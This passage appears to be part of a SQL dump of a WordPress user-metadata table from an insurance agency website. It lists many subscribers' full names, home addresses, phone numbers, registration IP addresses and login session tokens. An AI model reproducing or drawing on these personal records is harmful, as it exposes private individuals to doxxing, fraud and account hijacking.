Safari/537.36\";s:5:\"login\";i:1462468398;}}'),(5189,167,'nickname','Pollak'),(5192,167,'first_name','Elya'),(5195,167,'last_name','Pollak'),(5198,167,'description',''),(5201,167,'rich_editing','true'),(5204,167,'comment_shortcuts','false'),(5207,167,'admin_color','fresh'),(5210,167,'use_ssl','0'),(5213,167,'show_admin_bar_front','true'),(5216,167,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5219,167,'wp_user_level','0'),(5222,167,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5225,167,'addr1','777 Bedford Ave.'),(5228,167,'addr2','38 Skillman st.'),(5231,167,'city','Brooklyn'),(5234,167,'thestate','N.Y.'),(5237,167,'zip','11205'),(5240,167,'country','U.S.A.'),(5243,167,'phone1','1646 552 2482'),(5246,167,'wpmem_reg_ip','108.58.88.178'),(5249,167,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(5252,167,'tos',''),(5255,167,'bgusername',''),(5258,167,'active','1'),(5261,170,'nickname','yoelnyl'),(5264,170,'first_name','Yoel'),(5267,170,'last_name','Felberbaum'),(5270,170,'description',''),(5273,170,'rich_editing','true'),(5276,170,'comment_shortcuts','false'),(5279,170,'admin_color','fresh'),(5282,170,'use_ssl','0'),(5285,170,'show_admin_bar_front','true'),(5288,170,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5291,170,'wp_user_level','0'),(5294,170,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5297,170,'addr1','134 Broadway'),(5300,170,'addr2',''),(5303,170,'city','Brooklyn'),(5306,170,'thestate','New York'),(5309,170,'zip','11249'),(5312,170,'country','USA'),(5315,170,'phone1','7183028647'),(5318,170,'wpmem_reg_ip','24.213.178.195'),(5321,170,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(5322,170,'tos',''),(5325,170,'bgusername',''),(5328,170,'active','1'),(5331,170,'session_tokens','a:2:{s:64:\"9ed52f9c2145ea9713d959dac83c43fd80a5e977497c1681da2883b4b142650d\";a:4:{s:10:\"expiration\";i:1455814977;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\";s:5:\"login\";i:1455642177;}s:64:\"bb12c785d6c0a513cf00a0d63fea5c1e09f5bd658445be4f5ecb23404714e44b\";a:4:{s:10:\"expiration\";i:1455815048;s:2:\"ip\";s:14:\"24.213.178.195\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\";s:5:\"login\";i:1455642248;}}'),(5334,171,'nickname','Schwartz1907'),(5337,171,'first_name','Esther'),(5340,171,'last_name','Schwartz'),(5343,171,'description',''),(5346,171,'rich_editing','true'),(5349,171,'comment_shortcuts','false'),(5352,171,'admin_color','fresh'),(5355,171,'use_ssl','0'),(5358,171,'show_admin_bar_front','true'),(5361,171,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5364,171,'wp_user_level','0'),(5367,171,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5370,171,'addr1','559 Flushing Avenue'),(5373,171,'addr2',''),(5376,171,'city','BROOKLYN'),(5379,171,'thestate','NY'),(5382,171,'zip','11206'),(5385,171,'country','US'),(5388,171,'phone1','7182221907'),(5391,171,'wpmem_reg_ip','50.74.50.37'),(5394,171,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(5396,171,'tos',''),(5399,171,'bgusername',''),(5402,171,'active','1'),(5403,174,'nickname','Chaim Babad'),(5406,174,'first_name','Chaim'),(5409,174,'last_name','Babad'),(5412,174,'description',''),(5415,174,'rich_editing','true'),(5418,174,'comment_shortcuts','false'),(5421,174,'admin_color','fresh'),(5424,174,'use_ssl','0'),(5427,174,'show_admin_bar_front','true'),(5430,174,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5433,174,'wp_user_level','0'),(5436,174,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5439,174,'addr1','3611 14th Avenue'),(5442,174,'addr2',''),(5445,174,'city','Brooklyn'),(5448,174,'thestate','New York'),(5451,174,'zip','11218'),(5454,174,'country','USA'),(5457,174,'phone1','718 436 0088'),(5460,174,'wpmem_reg_ip','104.246.54.244'),(5463,174,'wpmem_reg_url','http://www.empireins.com/forms/'),(5466,174,'tos',''),(5469,174,'bgusername',''),(5472,174,'active','1'),(5479,175,'nickname','samekstein'),(5482,175,'first_name','Samuel'),(5485,175,'last_name','Ekstein'),(5488,175,'description',''),(5491,175,'rich_editing','true'),(5494,175,'comment_shortcuts','false'),(5497,175,'admin_color','fresh'),(5500,175,'use_ssl','0'),(5503,175,'show_admin_bar_front','true'),(5506,175,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5509,175,'wp_user_level','0'),(5512,175,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5515,175,'addr1','12 Ruzhin Rd. unit 101'),(5518,175,'addr2',''),(5521,175,'city','Monroe'),(5524,175,'thestate','NY'),(5527,175,'zip','10950'),(5530,175,'country','USA'),(5533,175,'phone1','845-662-7267'),(5536,175,'wpmem_reg_ip','66.55.146.149'),(5539,175,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(5541,175,'tos',''),(5544,175,'bgusername',''),(5547,175,'active','1'),(5550,174,'session_tokens','a:2:{s:64:\"1abc2a43fb8783a2bfccc5c6fde6f972388d4b03960e464d3a4162f3e2c1960b\";a:4:{s:10:\"expiration\";i:1460057386;s:2:\"ip\";s:14:\"104.246.54.244\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\";s:5:\"login\";i:1459884586;}s:64:\"1a740d60867166b6a01e75bff3b6d884d0c71acc8c2d7de9c703a65c0fb0259d\";a:4:{s:10:\"expiration\";i:1460143615;s:2:\"ip\";s:14:\"104.246.54.244\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36\";s:5:\"login\";i:1459970815;}}'),(5551,178,'nickname','gkruger38'),(5554,178,'first_name','Golda'),(5557,178,'last_name','Kruger'),(5560,178,'description',''),(5563,178,'rich_editing','true'),(5566,178,'comment_shortcuts','false'),(5569,178,'admin_color','fresh'),(5572,178,'use_ssl','0'),(5575,178,'show_admin_bar_front','true'),(5578,178,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5581,178,'wp_user_level','0'),(5584,178,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5587,178,'addr1','1848 54th Street'),(5590,178,'addr2',''),(5593,178,'city','Brooklyn'),(5596,178,'thestate','NY'),(5599,178,'zip','11204'),(5602,178,'country','United States'),(5605,178,'phone1','3475858394'),(5608,178,'wpmem_reg_ip','69.164.133.143'),(5611,178,'wpmem_reg_url','http://www.empireins.com/register/'),(5613,178,'tos',''),(5616,178,'bgusername','gkruger38'),(5619,178,'active','1'),(5622,178,'session_tokens','a:1:{s:64:\"c3b62e62862c2aa6cb7c5bfcc1f52b482f5e54a4af542c68e2f9e571f7eb9e85\";a:4:{s:10:\"expiration\";i:1456363155;s:2:\"ip\";s:14:\"69.164.133.143\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456190355;}}'),(5624,179,'nickname','neal5414d'),(5627,179,'first_name','asher'),(5630,179,'last_name','stern'),(5633,179,'description',''),(5636,179,'rich_editing','true'),(5639,179,'comment_shortcuts','false'),(5642,179,'admin_color','fresh'),(5645,179,'use_ssl','0'),(5648,179,'show_admin_bar_front','true'),(5651,179,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5654,179,'wp_user_level','0'),(5657,179,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5660,179,'addr1','541 wythe ave 4d'),(5663,179,'addr2',''),(5666,179,'city','brooklyn'),(5669,179,'thestate','ny'),(5672,179,'zip','11249'),(5675,179,'country','kings'),(5678,179,'phone1','9173310671'),(5681,179,'wpmem_reg_ip','69.119.235.150'),(5684,179,'wpmem_reg_url','http://www.empireins.com/insentives/'),(5685,180,'nickname','jaynylic'),(5688,180,'first_name','Joseph'),(5691,180,'last_name','Spira'),(5694,180,'description',''),(5697,180,'rich_editing','true'),(5700,180,'comment_shortcuts','false'),(5703,180,'admin_color','fresh'),(5706,180,'use_ssl','0'),(5709,180,'show_admin_bar_front','true'),(5712,180,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5715,180,'wp_user_level','0'),(5718,180,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5721,180,'addr1','1363 40 Street'),(5724,180,'addr2',''),(5727,180,'city','BROOKLYN'),(5730,180,'thestate','NEW YORK'),(5733,180,'zip','11218'),(5736,180,'country','United States'),(5739,180,'phone1','9177765607'),(5742,180,'wpmem_reg_ip','69.112.101.64'),(5745,180,'wpmem_reg_url','http://www.empireins.com/register/'),(5748,183,'nickname','jspira'),(5751,183,'first_name','Joseph'),(5754,183,'last_name','Spira'),(5757,183,'description',''),(5760,183,'rich_editing','true'),(5763,183,'comment_shortcuts','false'),(5766,183,'admin_color','fresh'),(5769,183,'use_ssl','0'),(5772,183,'show_admin_bar_front','true'),(5775,183,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5778,183,'wp_user_level','0'),(5781,183,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5784,183,'addr1','1363 40 Street'),(5787,183,'addr2',''),(5790,183,'city','BROOKLYN'),(5793,183,'thestate','NEW YORK'),(5796,183,'zip','11218'),(5799,183,'country','United States'),(5802,183,'phone1','9177765607'),(5805,183,'wpmem_reg_ip','69.112.101.64'),(5808,183,'wpmem_reg_url','http://www.empireins.com/register/'),(5810,185,'nickname','jspira1'),(5813,185,'first_name','Joseph'),(5816,185,'last_name','Spira'),(5819,185,'description',''),(5822,185,'rich_editing','true'),(5825,185,'comment_shortcuts','false'),(5828,185,'admin_color','fresh'),(5831,185,'use_ssl','0'),(5834,185,'show_admin_bar_front','true'),(5837,185,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5840,185,'wp_user_level','0'),(5843,185,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5846,185,'addr1','1363 40 Street'),(5849,185,'addr2',''),(5852,185,'city','BROOKLYN'),(5855,185,'thestate','NEW YORK'),(5858,185,'zip','11218'),(5861,185,'country','United States'),(5864,185,'phone1','9177765607'),(5867,185,'wpmem_reg_ip','69.112.101.64'),(5870,185,'wpmem_reg_url','http://www.empireins.com/register/'),(5871,179,'tos',''),(5874,179,'bgusername','neal5414d'),(5877,185,'tos',''),(5880,185,'bgusername',''),(5883,185,'active','1'),(5886,185,'session_tokens','a:1:{s:64:\"c9244e849cea6117d2d858ba9f7a99bef8178069489d56b4eb2bf28c7f2e1fa9\";a:4:{s:10:\"expiration\";i:1462388148;s:2:\"ip\";s:14:\"69.112.198.211\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36\";s:5:\"login\";i:1462215348;}}'),(5889,186,'nickname','benzion banash'),(5892,186,'first_name','benzion'),(5895,186,'last_name','banash'),(5898,186,'description',''),(5901,186,'rich_editing','true'),(5904,186,'comment_shortcuts','false'),(5907,186,'admin_color','fresh'),(5910,186,'use_ssl','0'),(5913,186,'show_admin_bar_front','true'),(5916,186,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5919,186,'wp_user_level','0'),(5922,186,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5925,186,'addr1','968 46'),(5928,186,'addr2',''),(5931,186,'city','ny'),(5934,186,'thestate','ny'),(5937,186,'zip','11219'),(5940,186,'country','usa'),(5943,186,'phone1','3475853389'),(5946,186,'wpmem_reg_ip','50.242.18.245'),(5949,186,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(5952,186,'tos',''),(5955,186,'bgusername',''),(5958,186,'active','1'),(5960,188,'nickname','levitauber'),(5963,188,'first_name','Levi'),(5966,188,'last_name','Tauber'),(5969,188,'description',''),(5972,188,'rich_editing','true'),(5975,188,'comment_shortcuts','false'),(5978,188,'admin_color','fresh'),(5981,188,'use_ssl','0'),(5984,188,'show_admin_bar_front','true'),(5987,188,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(5990,188,'wp_user_level','0'),(5993,188,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(5996,188,'addr1','33 Twin Avenue'),(5999,188,'addr2',''),(6002,188,'city','Spring Valley'),(6005,188,'thestate','NY'),(6008,188,'zip','10977'),(6011,188,'country','USA'),(6014,188,'phone1','845-263-6350'),(6017,188,'wpmem_reg_ip','100.2.174.18'),(6020,188,'wpmem_reg_url','http://www.empireins.com/forms/'),(6021,188,'tos',''),(6024,188,'bgusername',''),(6027,188,'active','1'),(6029,186,'session_tokens','a:2:{s:64:\"033f5b4a77cf5cb9897c7ba38a4f09ae887d72dc6be67cf5fa498598497d1c82\";a:4:{s:10:\"expiration\";i:1456618553;s:2:\"ip\";s:14:\"69.114.209.224\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456445753;}s:64:\"e94e320a320b8b8ef379e4100e2b1b0e7170365af44e41b03607ce331c38143a\";a:4:{s:10:\"expiration\";i:1456618591;s:2:\"ip\";s:14:\"69.114.209.224\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456445791;}}'),(6031,10,'tos',''),(6034,10,'bgusername',''),(6035,10,'active','1'),(6037,10,'session_tokens','a:2:{s:64:\"efbd5544cbf86179c056688a36771e23213e3de7fb935d7c097900a5c574f8b0\";a:4:{s:10:\"expiration\";i:1457111566;s:2:\"ip\";s:13:\"96.224.199.60\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456938766;}s:64:\"955d660ba4e8754fa84b88dfef7aee5bde95b3610d4a63c6afe7fc3001a0629c\";a:4:{s:10:\"expiration\";i:1457161597;s:2:\"ip\";s:15:\"122.168.196.170\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36\";s:5:\"login\";i:1456988797;}}'),(6038,10,'wp_dashboard_quick_press_last_post_id','512'),(6040,190,'nickname','imayer'),(6043,190,'first_name','isaac'),(6046,190,'last_name','mayer'),(6049,190,'description',''),(6052,190,'rich_editing','true'),(6055,190,'comment_shortcuts','false'),(6058,190,'admin_color','fresh'),(6061,190,'use_ssl','0'),(6064,190,'show_admin_bar_front','true'),(6067,190,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6070,190,'wp_user_level','0'),(6073,190,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6076,190,'addr1','1262 56th Street'),(6079,190,'addr2',''),(6082,190,'city','Brooklyn'),(6085,190,'thestate','brooklyn'),(6088,190,'zip','11219'),(6091,190,'country','KINGS'),(6094,190,'phone1','7184364956'),(6097,190,'wpmem_reg_ip','173.220.69.210'),(6100,190,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(6103,190,'tos',''),(6106,190,'bgusername',''),(6109,190,'active','1'),(6112,190,'session_tokens','a:1:{s:64:\"ce6126e6c05996088f093da4e0bdc0c1307b5138c1ca83dc470c210a80c06731\";a:4:{s:10:\"expiration\";i:1460569655;s:2:\"ip\";s:14:\"173.220.69.210\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\";s:5:\"login\";i:1459360055;}}'),(6113,10,'wp__wassup_settings','a:14:{s:13:\"detail_filter\";s:10:\"everything\";s:12:\"detail_chart\";s:1:\"1\";s:12:\"detail_limit\";s:2:\"10\";s:18:\"detail_time_period\";s:1:\"1\";s:10:\"spy_filter\";s:10:\"everything\";s:7:\"spy_map\";s:1:\"1\";s:14:\"ualert_message\";s:0:\"\";s:6:\"unonce\";i:71595;s:5:\"umark\";s:0:\"\";s:3:\"uip\";s:0:\"\";s:6:\"urecid\";i:0;s:10:\"utimestamp\";i:0;s:9:\"uwassupid\";s:0:\"\";s:8:\"uversion\";s:3:\"1.9\";}'),(6115,1,'wp__wassup_settings','a:14:{s:13:\"detail_filter\";s:10:\"everything\";s:12:\"detail_chart\";s:1:\"1\";s:12:\"detail_limit\";s:2:\"10\";s:18:\"detail_time_period\";s:1:\"1\";s:10:\"spy_filter\";s:10:\"everything\";s:7:\"spy_map\";s:1:\"1\";s:14:\"ualert_message\";s:0:\"\";s:6:\"unonce\";i:858551;s:5:\"umark\";s:0:\"\";s:3:\"uip\";s:0:\"\";s:6:\"urecid\";i:0;s:10:\"utimestamp\";i:0;s:9:\"uwassupid\";s:0:\"\";s:8:\"uversion\";s:3:\"1.9\";}'),(6116,1,'wp_media_library_mode','grid'),(6119,57,'tos',''),(6122,57,'bgusername',''),(6124,193,'nickname','jsimcha'),(6127,193,'first_name','Jack'),(6130,193,'last_name','Simcha'),(6133,193,'description',''),(6136,193,'rich_editing','true'),(6139,193,'comment_shortcuts','false'),(6142,193,'admin_color','fresh'),(6145,193,'use_ssl','0'),(6148,193,'show_admin_bar_front','true'),(6151,193,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6154,193,'wp_user_level','0'),(6157,193,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6160,193,'addr1','131 Route 306'),(6163,193,'addr2',''),(6166,193,'city','Monsey'),(6169,193,'thestate','NY'),(6172,193,'zip','10952'),(6175,193,'country','USA'),(6178,193,'phone1','8454259773'),(6181,193,'wpmem_reg_ip','69.116.56.224'),(6184,193,'wpmem_reg_url','http://www.empireins.com/agent-tools/'),(6185,193,'tos',''),(6188,193,'bgusername','jsimcha'),(6191,193,'active','1'),(6193,193,'session_tokens','a:3:{s:64:\"eb965553dd90d81fb475d3ef60357cc6f01df87485b34f75c83a91516b3ca88e\";a:4:{s:10:\"expiration\";i:1462467834;s:2:\"ip\";s:13:\"67.83.103.143\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462295034;}s:64:\"de02e6690fad696971cdc1122a3d907129ab3ba2d2fbf2b475009598e7c7a1ac\";a:4:{s:10:\"expiration\";i:1462467875;s:2:\"ip\";s:13:\"67.83.103.143\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462295075;}s:64:\"36ccd6d33be5e77e4f876072ca34b5b994b9d46a37e97f26b5c86e604022b117\";a:4:{s:10:\"expiration\";i:1463504713;s:2:\"ip\";s:13:\"67.83.103.143\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1462295113;}}'),(6196,37,'session_tokens','a:3:{s:64:\"33e1eecbec2e8fbf13d9736c7250c74136683fc8dd1a160e31a8409d8d3e020f\";a:4:{s:10:\"expiration\";i:1457644657;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1457471857;}s:64:\"8fa8d7e7c9fef46670321177573577eadff9cd76660e57093206bd50be73808d\";a:4:{s:10:\"expiration\";i:1457644713;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36\";s:5:\"login\";i:1457471913;}s:64:\"667ff1b8c618ab42dbdaf0de0c6fe18712ee93538e9ed9337fb416d02144fb9d\";a:4:{s:10:\"expiration\";i:1457645694;s:2:\"ip\";s:13:\"108.58.88.178\";s:2:\"ua\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36\";s:5:\"login\";i:1457472894;}}'),(6198,70,'wp__wassup_settings','a:14:{s:13:\"detail_filter\";s:10:\"everything\";s:12:\"detail_chart\";s:1:\"1\";s:12:\"detail_limit\";s:2:\"10\";s:18:\"detail_time_period\";s:1:\"1\";s:10:\"spy_filter\";s:10:\"everything\";s:7:\"spy_map\";s:1:\"1\";s:14:\"ualert_message\";s:0:\"\";s:6:\"unonce\";i:669555;s:5:\"umark\";s:0:\"\";s:3:\"uip\";s:0:\"\";s:6:\"urecid\";i:0;s:10:\"utimestamp\";i:0;s:9:\"uwassupid\";s:0:\"\";s:8:\"uversion\";s:3:\"1.9\";}'),(6203,194,'nickname','cgancz'),(6206,194,'first_name','Chaim'),(6209,194,'last_name','Gancz'),(6212,194,'description',''),(6215,194,'rich_editing','true'),(6218,194,'comment_shortcuts','false'),(6221,194,'admin_color','fresh'),(6224,194,'use_ssl','0'),(6227,194,'show_admin_bar_front','true'),(6230,194,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6233,194,'wp_user_level','0'),(6236,194,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6239,194,'addr1','137 Division Ave'),(6242,194,'addr2','2 floor'),(6245,194,'city','Brooklyn'),(6248,194,'thestate','NY'),(6251,194,'zip','11211'),(6254,194,'country','USA'),(6257,194,'phone1','7184864681'),(6260,194,'wpmem_reg_ip','209.64.152.62'),(6263,194,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(6264,194,'tos',''),(6267,194,'bgusername',''),(6273,195,'nickname','yoel shtesl'),(6276,195,'first_name','yoel'),(6279,195,'last_name','shtesl'),(6282,195,'description',''),(6285,195,'rich_editing','true'),(6288,195,'comment_shortcuts','false'),(6291,195,'admin_color','fresh'),(6294,195,'use_ssl','0'),(6297,195,'show_admin_bar_front','true'),(6300,195,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6303,195,'wp_user_level','0'),(6306,195,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6309,195,'addr1','1852 49th street'),(6312,195,'addr2',''),(6315,195,'city','brooklyn'),(6318,195,'thestate','New York'),(6321,195,'zip','11204'),(6324,195,'country','usa'),(6327,195,'phone1','3475123454'),(6330,195,'wpmem_reg_ip','108.21.117.110'),(6333,195,'wpmem_reg_url','http://www.empireins.com/register/'),(6336,195,'tos',''),(6339,195,'bgusername',''),(6342,195,'active','1'),(6344,195,'session_tokens','a:1:{s:64:\"818ccfd71512ed5aad91850a60c05868351352786c8b25edcb028222a46fc6d9\";a:4:{s:10:\"expiration\";i:1458398794;s:2:\"ip\";s:14:\"108.21.117.110\";s:2:\"ua\";s:109:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\";s:5:\"login\";i:1458225994;}}'),(6345,198,'nickname','avi'),(6348,198,'first_name','avi'),(6351,198,'last_name','stern'),(6354,198,'description',''),(6357,198,'rich_editing','true'),(6360,198,'comment_shortcuts','false'),(6363,198,'admin_color','fresh'),(6366,198,'use_ssl','0'),(6369,198,'show_admin_bar_front','true'),(6372,198,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6375,198,'wp_user_level','0'),(6378,198,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6381,198,'addr1','1524 58th st'),(6384,198,'addr2',''),(6387,198,'city','brooklyn'),(6390,198,'thestate','ny'),(6393,198,'zip','11219'),(6396,198,'country','usa'),(6399,198,'phone1','9176813460'),(6402,198,'wpmem_reg_ip','104.246.54.244'),(6405,198,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(6407,200,'nickname','avistern'),(6410,200,'first_name','avi'),(6413,200,'last_name','stern'),(6416,200,'description',''),(6419,200,'rich_editing','true'),(6422,200,'comment_shortcuts','false'),(6425,200,'admin_color','fresh'),(6428,200,'use_ssl','0'),(6431,200,'show_admin_bar_front','true'),(6434,200,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6437,200,'wp_user_level','0'),(6440,200,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6443,200,'addr1','1524 58th st'),(6446,200,'addr2',''),(6449,200,'city','brooklyn'),(6452,200,'thestate','ny'),(6455,200,'zip','11219'),(6458,200,'country','usa'),(6461,200,'phone1','9176813460'),(6464,200,'wpmem_reg_ip','104.246.54.244'),(6467,200,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(6468,201,'nickname','astern'),(6471,201,'first_name','avi'),(6474,201,'last_name','stern'),(6477,201,'description',''),(6480,201,'rich_editing','true'),(6483,201,'comment_shortcuts','false'),(6486,201,'admin_color','fresh'),(6489,201,'use_ssl','0'),(6492,201,'show_admin_bar_front','true'),(6495,201,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6498,201,'wp_user_level','0'),(6501,201,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6504,201,'addr1','1524 58th st'),(6507,201,'addr2',''),(6510,201,'city','brooklyn'),(6513,201,'thestate','ny'),(6516,201,'zip','11219'),(6519,201,'country','usa'),(6522,201,'phone1','9176813460'),(6525,201,'wpmem_reg_ip','104.246.54.244'),(6528,201,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(6530,201,'tos',''),(6533,201,'bgusername',''),(6536,201,'active','1'),(6537,201,'session_tokens','a:1:{s:64:\"b9edf1ea7a6110bed7d4251bf5e3b9b8d43a6d46ae507a0389abe459c5a1b0d6\";a:4:{s:10:\"expiration\";i:1459455230;s:2:\"ip\";s:14:\"104.246.54.244\";s:2:\"ua\";s:68:\"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\";s:5:\"login\";i:1458245630;}}'),(6539,203,'nickname','Pixiedust'),(6542,203,'first_name','Debby'),(6545,203,'last_name','Hernandez'),(6548,203,'description',''),(6551,203,'rich_editing','true'),(6554,203,'comment_shortcuts','false'),(6557,203,'admin_color','fresh'),(6560,203,'use_ssl','0'),(6563,203,'show_admin_bar_front','true'),(6566,203,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6569,203,'wp_user_level','0'),(6572,203,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6575,203,'addr1','1408 e Hastings ave'),(6578,203,'addr2',''),(6581,203,'city','Amarillo'),(6584,203,'thestate','Texas'),(6587,203,'zip','79108'),(6590,203,'country','USA'),(6593,203,'phone1','8062313254'),(6596,203,'wpmem_reg_ip','70.195.195.244'),(6599,203,'wpmem_reg_url','http://www.empireins.com/register/'),(6600,79,'session_tokens','a:1:{s:64:\"206b9772cf39a0cafd79f4c8341a1ae9fbedd4f38160271c81f49f302bc9366b\";a:4:{s:10:\"expiration\";i:1458687059;s:2:\"ip\";s:14:\"108.46.238.247\";s:2:\"ua\";s:73:\"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0\";s:5:\"login\";i:1458514259;}}'),(6603,204,'nickname','paskesz1'),(6606,204,'first_name','abraham'),(6609,204,'last_name','Paskesz'),(6612,204,'description',''),(6615,204,'rich_editing','true'),(6618,204,'comment_shortcuts','false'),(6621,204,'admin_color','fresh'),(6624,204,'use_ssl','0'),(6627,204,'show_admin_bar_front','true'),(6630,204,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6633,204,'wp_user_level','0'),(6636,204,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6639,204,'addr1','100 Horton Dr'),(6642,204,'addr2',''),(6645,204,'city','Monsey'),(6648,204,'thestate','New York'),(6651,204,'zip','10952'),(6654,204,'country','usa'),(6657,204,'phone1','9177715004'),(6660,204,'wpmem_reg_ip','47.17.231.64'),(6663,204,'wpmem_reg_url','http://www.empireins.com/term-quotes/'),(6666,204,'tos',''),(6669,204,'bgusername',''),(6672,204,'active','1'),(6675,207,'nickname','kmonroe'),(6678,207,'first_name','Kevin'),(6681,207,'last_name','Monroe'),(6684,207,'description',''),(6687,207,'rich_editing','true'),(6690,207,'comment_shortcuts','false'),(6693,207,'admin_color','fresh'),(6696,207,'use_ssl','0'),(6699,207,'show_admin_bar_front','true'),(6702,207,'wp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(6705,207,'wp_user_level','0'),(6708,207,'dismissed_wp_pointers','wp360_locks,wp390_widgets'),(6711,207,'addr1','6214 NE 12th'),(6714,207,'addr2',''),(6717,207,'city','Amarillo'),(6720,207,'thestate','TX'),(6723,207,'zip','79107'),(6726,207,'country','United 